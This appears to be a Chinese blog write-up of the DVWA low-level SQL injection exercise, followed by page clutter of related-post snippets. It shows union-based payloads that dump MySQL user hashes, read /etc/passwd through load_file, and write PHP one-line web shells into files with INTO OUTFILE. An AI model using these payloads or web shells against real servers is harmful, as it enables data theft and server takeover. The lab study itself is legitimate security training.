SQL Injection --low

最新推荐文章于 2022-11-17 13:48:14 发布
最新推荐文章于 2022-11-17 13:48:14 发布
阅读量419 收藏 1
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wangxiao_2/article/details/39803755
本文深入探讨了SQL注入攻击的原理与危害,通过实例展示了如何利用注入点获取服务器敏感信息,包括用户身份验证、数据库架构、系统文件读取及在特定环境下利用一句话木马实现服务器控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


<?php    

if(isset($_GET['Submit'])){
    
    // Retrieve data
    
    $id = $_GET['id'];

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );

    $num = mysql_numrows($result);

    $i = 0;

    while ($i < $num) {

        $first = mysql_result($result,$i,"first_name");
        $last = mysql_result($result,$i,"last_name");
        
        echo '<pre>';
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>';

        $i++;
    }
}
?>

抓关键语句 : 

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid)

这里对$id参数没有任何过滤

这里是字符型注入

用 1'and '1'='1  和 1'and '1'='2 可以发现存在漏洞

接下来用    1'  order by  2#

所以这个可以简单构造一个     $id=  -1'union select 1,2# 

这样带进去可以带到  sql语句为   

SELECT first_name, last_name FROM users WHERE user_id = ''union select 1,2# '
所以这里用上了联合查询 :

<pre name="code" class="php">SELECT first_name, last_name FROM users WHERE user_id = ''
union
select 1,2
# '
而后面就实现了自己想要的select查询  
这里井号的作用就是屏蔽后面的sql语句内容

那么这里就可以利用sql语句来做我们想做的事情咯。

我们想得到有关php和服务器的信息
<pre>ID: -1' union select 1,concat_ws(char(32,58,32),user(),database(),version()) #
First name: 1
Surname: root@localhost : dvwa : 5.5.38-0ubuntu0.14.04.1

这个是用php+mysql搭建的
mysql数据库可以通过系统表查询
schema_name from information_schema.schemata

我们通过它可以得到数据库信息:
ID:  -1'union select 1,schema_name from information_schema.schemata #
First name: 1
Surname: information_schema
ID:  -1'union select 1,schema_name from information_schema.schemata #
First name: 1
Surname: dvwa
ID:  -1'union select 1,schema_name from information_schema.schemata #
First name: 1
Surname: mysql
ID:  -1'union select 1,schema_name from information_schema.schemata #
First name: 1
Surname: performance_schema



我们可以得到当前的用户和密码


-1'union select 1,concat(user,':',password)from mysql.user# 




ID: -1'union select 1,concat(user,':',password)from mysql.user# 
First name: 1
Surname: root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11


ID: -1'union select 1,concat(user,':',password)from mysql.user# 
First name: 1
Surname: debian-sys-maint:*8010250A4C3114D73C23FCBFCB69BEB2FA21F917

还可以读取系统文件



load_file('X:/php.ini')

magic_quotes_gpc 开启的环境需要转为16进制再读取




-1'union select 1,load_file('/etc/passwd')# 




得到信息如下






ID: -1'union select 1,load_file('/etc/passwd')# 
First name: 1
Surname: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync












利用注入点写 shell            ////////////////////   '<?php system($_GET['sec']);?>' into outfile '/var/www/xiaoma.php'#









1' union select 1,2 into outfile '/tmp/xiaoma.txt'#   这句话是完全正确的 并且我在server上成功找到了这个文件


再构造一个类似的

1' union select 1,'<?php @eval($_POST[1])?>' into outfile '/tmp/xiaoma.php'#  成功


但是这里我们只是传到了tmp文件夹下 实际上 我们要传到 /var/www/目录下 也就是在服务器目录下  那么此时一句话木马就可以发挥作用了。。




测试的时候发现  mysql数据库不能在/var/www下拥有写权限  我要好好思考思考  怎么回事。。



































































                

        

    

    
  



    

      

        

            

              
                
                  wangxiao_2
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
浅谈SQL注入中的-1union select 1,2,3#

				
			

			

				

					qq_23667585的博客
				

				

					10-09
					
					1万+
					
				

			

		

		

			
				
超详细的介绍了SQL注入语句中的 -1' union select 1,2,3# 的含义

			
		

	



                

            
              



	

		

			

				
					
sql注入-union select

				
			

			

				

					我不是大牛
				

				

					06-24
					
					2万+
					
				

			

		

		

			
				
什么是SQL注入
SQL注入(Sql Injection )

是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击
这些参数传递给后台的SQL数据库服务器加以解析并执行

哪里存在SQL注入?

GET
POST
HTTP头部注入
Cookie注入

任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入。
SQL注入的分类

根据SQL数据类型分类


整型注...

			
		

	



              


  
              

                


	

		

			

				
					
DVWA之SQL注入(低级)

				
			

			

				

					heyingcheng的博客
				

				

					11-17
					
					2967
					
				

			

		

		

			
				
注意:我们在输入框输入id=1' order by 1#,通过改造sql语句修改了应用程序逻辑,执行的sql语句实际上数据库中执行的是:select * from 表 where id='1' order by 1 #'。由于#已经注释掉了后面所有的内容,所以实际上的效果:select * from 表 where id='1' order by 1#也可以换成--)继续输入1’and'1'='1或者1'='1发现可以正常回显,所以目前可以十分准确的判断存在的是sql注入中的字符型注入。

			
		

	





	

		

			

				
					
html sql注入_渗透测试新手入门之DVWA(SQL注入)篇

				
			

			

				

					weixin_39984982的博客
				

				

					11-16
					
					266
					
				

			

		

		

			
				
一、SQL注入概念SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。二、手工注入常规思路1.判断是否存在注入,注入是字符型还是数字型2.猜解SQL查询语句中的字段数3.确定回显位置4.获取当前数据库5.获取数据库中的表6.获取表中的字段名7.得到数据将DVWA的级别设置为low1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查...

			
		

	



		

			
		



	

		

			

				
					
为什么sql注入的时候会写union select 12~~~~~from admin

				
			

			

				

					被遗弃的庸才博客
				

				

					04-15
					
					1万+
					
				

			

		

		

			
				
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...

			
		

	





	

		

			

				
					
SELECT 1,2,3...的含义及其在SQL注入中的用法

					
热门推荐

				
			

			

				

					weixin_44840696的博客
				

				

					04-09
					
					2万+
					
				

			

		

		

			
				
SQL注入中,有两个工具常常用到,一个是select接一串数字,如select 1,2,3;另一个是order
by一个数字,如order by 4。那么这两个工具的内涵是什么,在SQL注入中又有什么作用呢?


首先,select
之后可以接一串数字:1,2,3…只是一个例子,这串数字并不一定要按从小到大排列,也不一定从1开始,这串数字的值和顺序是任意的,甚至可以是重复的,如:11,465...

			
		

	





	

		

			

				
					
一句话告诉你SQL注入中的select 12,3是什么意思,详解sql注入每一部分意义

				
			

			

				

					qq_62708558的博客
				

				

					02-13
					
					2万+
					
				

			

		

		

			
				
12,3会分别按照id,username,password的顺序输出,因为我们假设了登陆成功就会输出用户名和密码,因此1是不显示的,紧接着来到第二列,对应输出2所以我们知道账号是表格中的第二列,以此类推密码就是表格中的第三列

			
		

	





	

		

			

				
					
dvwa靶场之sql注入

				
			

			

				

					m0_63314341的博客
				

				

					02-19
					
					1517
					
				

			

		

		

			
				
sql注入是指通过分析代码,输入字符达到查找数据库中用户信息的一种行为,会导致用户账户的暴露

接下来我们先来分析一下源代码



SELECT first_name, last_name FROM users WHERE user_id = '$id'

其中重点则是上面的这段代码,这是对于数据库的一段查找代码

当我们为$id这个变量赋值时便会带入这段代码对数据库进行查询


...

			
		

	





	

		

			

				
					
新手指南:DVWA-1.9全级别教程之SQL Injection

				
			

			

				

					weixin_30345577的博客
				

				

					09-12
					
					510
					
				

			

		

		

			
				
*本文原创作者:lonehand,转载须注明来自FreeBuf.COM

目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。
DVWA简介
DVWA(Damn Vulnerable Web Application)是一个用...

			
		

	





	

		

			

				
					
sql注入中的联合注入

				
			

			

				

					..
				

				

					12-06
					
					7116
					
				

			

		

		

			
				
联合注入

联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。至于为什么需要版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。


UNION语法

mysql中,union用于将多个select语句的结果组合到一个结果集中,并删除结果集中的重复数据。

语法为:


select column,...from tabl.

			
		

	





	

		

			

				
					
SQL注入 为什么会有 num1‘ order by num2# , 为什么会有 union select 1,2,3...

				
			

			

				

					weixin_45897324的博客
				

				

					10-07
					
					1120
					
				

			

		

		

			
				
SQL注入 为什么会有 num1’ order by num2# , 为什么会有 union select 1,2,3…


group by / order by

如 1’ order by 3#
group by, order by 后面跟数字,指的是 select 后面选择的列(属性),这里的3 代表第一个属性,依次类推。
当表中只有3个列时,order by 4就会出错

union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填

			
		

	





	

		

			

				
					
深入理解SQL注入中的union select 1,2,3....

				
			

			

				

					渗透之路,攻防之间皆学问
				

				

					03-15
					
					2万+
					
				

			

		

		

			
				
UNION 用于合并两个查询的结果集

			
		

	





	

		

			

				
					
初学Web安全之sql注入(一)

				
			

			

				

					weixin_47531846的博客
				

				

					11-17
					
					2474
					
				

			

		

		

			
				
初学Web安全之sql注入(一)
sql注入产生原因
sql注入漏洞的产生需要满足以下两个条件:


参数用户可控
传入的参数拼接到sql语句并且带入到数据库查询


一般来说,用户登录网页所使用的sql语句为:
select * from user where username='admin' and password='password';

而如果程序员设计网页之初没有对用户的输入进行过滤,使得用户的输入可以带入到数据库,那么这时候就可以产生sql注入,最简单的一种,就是构造万能密码,这里拿dvwa来

			
		

	





	

		

			

				
					
暑期沉淀web学习——SQL注入基础(基础&数字型&字符型)

				
			

			

				

					wang_zui_zui的博客
				

				

					07-14
					
					722
					
				

			

		

		

			
				
low1'and'1'='1//判断正确1'and'1'='2//判断错误1'orderby2#//判断数据表的列数#//查看信息泄露的点#//通过泄露点查看数据库的名称#//查询当前数据库里面所有表的名字#//查询users表里面的所有列的名字#group_concat(列名)会把这一列中所有的内容在一行中以,隔开输出。...

			
		

	





	

		

			

				
					
渗透测试 | SQL注入字符注入详解

				
			

			

				

					yu_19980401的博客
				

				

					11-17
					
					2198
					
				

			

		

		

			
				
SQL注入详解
SQL注入的概念
SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。
字符注入
后台语句模板
SELECT first_name,last_name FROM users WHERE user_id = ‘$id’;
正常访问
SELECT first_name,last_name FROM users WHERE user_id = ‘1’;
构造SQL注入语句
SELECT firs_name,last_name FROM user

			
		

	





	

		

			

				
					
3.sql injection之users表的字段猜解-------小白笔记

				
			

			

				

					qwsn
				

				

					11-03
					
					1719
					
				

			

		

		

			
				
1.查看源码:
得出重要的查询语句:SELECT first_name, last_name FROM users WHERE user_id = '$id';
//但是,这个只是为了平台的教学所用,才能够可以查看源码,一般情况下,网站是不会给你看这个代码的,所以你并不知道数据库中的表有多少字段供给查询
2.使用order by猜解users表中有多少字段数
源码:SELECT first_nam...

			
		

	





	

		

			

				
					
DVWA SQLinjection怎么用

					
最新发布

				
			

			

				

					07-31
				

			

		

		

			
				
<think>我们正在讨论DVWA中的SQL注入攻击。根据用户提供的引用,特别是引用[1]和[2],我们知道DVWA的SQL注入关卡分为不同安全级别(LOW, MEDIUM, HIGH, IMPOSSIBLE),并且攻击方法包括UNION注入、ERROR注入(针对非盲注)以及BOOLEAN盲注(针对盲注)。同时,引用[3]和[4]提到了一些防御措施,比如限制查询结果数量(LIMIT 1)以及分离查询提交页面和结果页面来防御自动化工具(如sqlmap)。

用户要求了解DVWA中SQL注入攻击的步骤和原理详解。我们将按照以下结构进行回答:

1. SQL注入原理简介
2. DVWA SQL Injection(非盲注)攻击步骤(针对LOW, MEDIUM, HIGH级别)
3. DVWA SQL Injection (Blind)(盲注)攻击步骤(针对LOW, MEDIUM, HIGH级别)
4. 防御措施分析(IMPOSSIBLE级别)

注意:在描述攻击步骤时,我们将结合引用[2]中的示例(获取dvwa数据库的所有表名)以及其他常见的注入技术。

由于引用中提到了使用手工注入和sqlmap,但TIME注入耗时太久未采用,因此我们将重点放在UNION注入、ERROR注入和BOOLEAN盲注上。

开始回答:</think>### DVWA SQL注入攻击步骤与原理详解  
DVWA(Damn Vulnerable Web Application)是一款专为安全测试设计的漏洞演练平台。以下针对其SQL注入漏洞(非盲注/盲注)的攻击步骤与原理进行详解,结合LOW、MEDIUM、HIGH安全级别的实践方法,并引用相关技术点[^1][^2][^3][^4]。

---

#### **一、SQL注入原理**  
**核心漏洞**:攻击者通过篡改输入参数,破坏原始SQL语句结构,执行恶意查询。  
**数学表达**:  
设原始查询为:  
$$Q = \text{SELECT * FROM users WHERE id = } \color{red}{\text{&#39;$input&#39;}}$$  
当输入为 `1&#39; UNION SELECT 1,table_name FROM information_schema.tables#` 时,实际执行语句变为:  
$$Q_{\text{malicious}} = \text{SELECT * FROM users WHERE id = &#39;1&#39; UNION SELECT 1,table_name FROM information_schema.tables#&#39;}$$  
导致数据库返回敏感信息(如表名、字段值)。

---

#### **二、非盲注攻击步骤(SQL Injection)**  
适用于页面直接返回查询结果的场景。  

##### **1. LOW级别**  
**漏洞点**:未过滤用户输入,直接拼接SQL语句[^1]。  
**攻击步骤**:  
1. **探测列数**(UNION注入前提):  
   ```sql
   1&#39; ORDER BY 3#  -- 尝试列数,直到报错(如ORDER BY 4报错则列数为3)
   ```  
2. **联合查询获取数据**(引用[2]示例):  
   ```sql
   1&#39; UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema=&#39;dvwa&#39;#  
   ```  
   - `1` 为占位符,匹配原始查询列数  
   - `information_schema.tables` 为系统表,存储所有表名  
   - `table_schema=&#39;dvwa&#39;` 限定目标数据库  

##### **2. MEDIUM级别**  
**漏洞点**:输入参数改为数字型(无引号),但未过滤[^3]。  
**攻击步骤**:  
1. **绕过数字型检测**:  
   ```sql
   1 UNION SELECT 1,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=&#39;dvwa&#39;#  
   ```  
   - 无需闭合引号,直接拼接UNION  

##### **3. HIGH级别**  
**漏洞点**:分离查询与结果页面(防自动化工具),但未过滤输入[^4]。  
**攻击步骤**:  
1. **利用Burp Suite绕过页面分离**:  
   - 拦截查询请求 → 修改参数为注入语句 → 转发获取响应  
   ```sql
   1&#39; UNION SELECT user,password FROM users#  
   ```  
   - 通过结果页面查看敏感数据(如密码哈希值)  

---

#### **三、盲注攻击步骤(SQL Injection Blind)**  
适用于页面无直接数据返回,但可通过布尔或时间差异判断结果。  

##### **1. BOOLEAN盲注(常用)**  
**原理**:根据页面返回内容差异(真/假)推断数据。  
**攻击步骤**(以获取数据库名为例):  
1. **判断数据库名长度**:  
   ```sql
   1&#39; AND LENGTH(DATABASE())=4#  -- 若页面返回正常,则库名长度为4  
   ```  
2. **逐字符猜解**:  
   ```sql
   1&#39; AND SUBSTRING(DATABASE(),1,1)=&#39;d&#39;#  -- 验证首字母是否为&#39;d&#39;  
   ```  
   - 使用 `SUBSTRING()` 或 `MID()` 函数截取字符  

##### **2. sqlmap自动化利用**  
**适用场景**:手工注入效率低时(如MEDIUM/HIGH级别)。  
**命令示例**:  
```bash
sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \  
       --cookie="PHPSESSID=xxx; security=medium" \  
       --batch --dbs  
```  
- `--dbs`:列举所有数据库  
- `--tables -D dvwa`:列举dvwa库的所有表  

> **注意**:HIGH级别因页面分离需配合Burp抓包(`--proxy=http://127.0.0.1:8080`)[^4]。

---

#### **四、防御机制分析(IMPOSSIBLE级别)**  
**安全代码原理**:  
1. **预处理语句(Prepared Statements)**:  
   ```php
   $stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id");  
   $stmt->bindParam(&#39;:id&#39;, $id, PDO::PARAM_INT); // 强制类型为整数  
   ```  
   - 输入参数与SQL逻辑分离,杜绝拼接  
2. **Token验证**:  
   - 每次提交需携带CSRF Token,阻止自动化工具重放攻击[^3]  

---

### 总结  
| 安全级别 | 注入方式          | 关键技巧                          |  
|----------|-------------------|-----------------------------------|  
| LOW      | UNION/ERROR注入   | 闭合单引号,联合查询系统表[^2]    |  
| MEDIUM   | 数字型UNION注入   | 省去引号,直接UNION               |  
| HIGH     | 工具绕过+手工注入 | Burp Suite拦截修改请求[^4]        |  
| IMPOSSIBLE | 防御生效          | 预处理语句+Token验证              |  

> 实践提示:  
> - 非盲注优先用UNION查询(高效)  
> - 盲注推荐BOOLEAN注入(避免耗时TIME注入)[^1]  
> - 遇到页面分离时,手动工具结合(Burp+sqlmap)  



			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值